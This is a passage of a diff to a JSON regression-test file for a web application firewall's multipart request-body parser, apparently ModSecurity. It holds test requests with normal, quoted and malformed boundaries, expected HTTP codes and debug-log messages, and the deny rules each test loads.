On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary special char - trailing exclamation+token)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=0000!1111", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(characters\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (quoted boundary - normal)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\"0000\"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "boundary was quoted" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (quoted boundary value - whitespace before)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\" 0000\"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "boundary was quoted.*No boundaries found in payload" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (quoted boundary value - whitespace after)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\"0000 \"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (quoted boundary value - whitespace after)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\"0000 \"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (quoted boundary value - whitespace between)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\"0000 1111\"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "boundary was quoted" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (quoted boundary value - contained quote)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\"00\"00\"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--00\"00\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--00\"00\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--00\"00\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--00\"00--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(characters\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (quoted boundary value - two quoted values)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\"00\"\"00\"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--00\"00\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--00\"00\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--00\"00\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--00\"00--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(characters\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (partial quoted boundary value - only start quote)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=\"0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(quote\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (partial quoted boundary value - only end quote)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=0000\"", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(quote\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (multipart mixed - normal)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r\n", - "Content-Disposition: form-data; name=\"name\"\r\n", - "\r\n", - "Brian Rectanus\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"email\"\r\n", - "\r\n", - "brian.rectanus@breach.com\r\n", - "--0000\r\n", - "Content-Disposition: attachment\r\n", - "Content-Type: multipart/mixed; boundary=BbC04y\r\n", - "\r\n", - "--BbC04y\r\n", - "Content-Disposition: file; filename=\"file1.txt\"\r\n", - "Content-Type: text/plain\r\n", - "\r\n", - "... contents of file1.txt ...\r\n", - "--BbC04y\r\n", - "Content-Disposition: file; filename=\"file2.gif\r\n", - "Content-Type: image/jpeg\r\n", - "Content-Transfer-Encoding: binary\r\n", - "\r\n", - "...contents of file2.gif...\r\n", - "--0000--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid Content-Disposition header" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (multipart mixed - missing disposition)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r\n", - "Content-Disposition: form-data; name=\"name\"\r\n", - "\r\n", - "Brian Rectanus\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"email\"\r\n", - "\r\n", - "brian.rectanus@breach.com\r\n", - "--0000\r\n", - "Content-Type: multipart/mixed; boundary=BbC04y\r\n", - "\r\n", - "--BbC04y\r\n", - "Content-Disposition: file; filename=\"file1.txt\"\r\n", - "Content-Type: text/plain\r\n", - "\r\n", - "... contents of file1.txt ...\r\n", - "--BbC04y\r\n", - "Content-Disposition: file; filename=\"file2.gif\r\n", - "Content-Type: image/jpeg\r\n", - "Content-Transfer-Encoding: binary\r\n", - "\r\n", - "...contents of file2.gif...\r\n", - "--0000--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Part missing Content-Disposition header" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (normal)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r\n", - "Content-Disposition: form-data; name=\"name\"\r\n", - "\r\n", - "Brian Rectanus\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"email\"\r\n", - "\r\n", - "brian.rectanus@breach.com\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r\n", - "Content-Type: image/jpeg\r\n", - "\r\n", - "BINARYDATA1\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r\n", - "Content-Type: image/jpeg\r\n", - "\r\n", - "BINARYDATA2\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r\n", - "Content-Type: image/jpeg\r\n", - "\r\n", - "BINARYDATA3\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"test\"\r\n", - "\r\n", - "This is test data.\r\n", - "--0000--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Upload file limit exceeded" - }, - "rules":[ - "SecRuleEngine On", - "SecUploadKeepFiles On", - "SecUploadDir /tmp", - "SecUploadFileLimit 2", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500161\"", - "SecRule MULTIPART_FILE_LIMIT_EXCEEDED \"!@eq 1\" \"phase:2,deny,id:500162\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500163\"", - "SecRule &FILES \"!@eq 3\" \"phase:2,deny,id:500164\"", - "SecRule &FILES_NAMES \"!@eq 3\" \"phase:2,deny,id:500165\"", - "SecRule &FILES_SIZES \"!@eq 3\" \"phase:2,deny,id:500166\"", - "SecRule FILES_SIZES:/^image/ \"@eq 0\" \"phase:2,deny,id:500167\"", - "SecRule &FILES_TMPNAMES \"!@eq 2\" \"phase:2,deny,id:500168\"" - ] +[ + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (normal)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA\r\n", + "--0000--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Added file part to the list: name \"image\" file name \"image.jpg\" \\(offset 258, length 10\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (final CRLF)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (no final CRLF)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (boundary contains \"boundary\")", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=------------------------------------------------boundary", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--------------------------------------------------boundary\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "--------------------------------------------------boundary\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "--------------------------------------------------boundary--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (boundary contains \"bOuNdArY\")", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=--------0xKhTmLbOuNdArY", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "----------0xKhTmLbOuNdArY\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "----------0xKhTmLbOuNdArY\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "----------0xKhTmLbOuNdArY--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (data contains \"--\")", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: 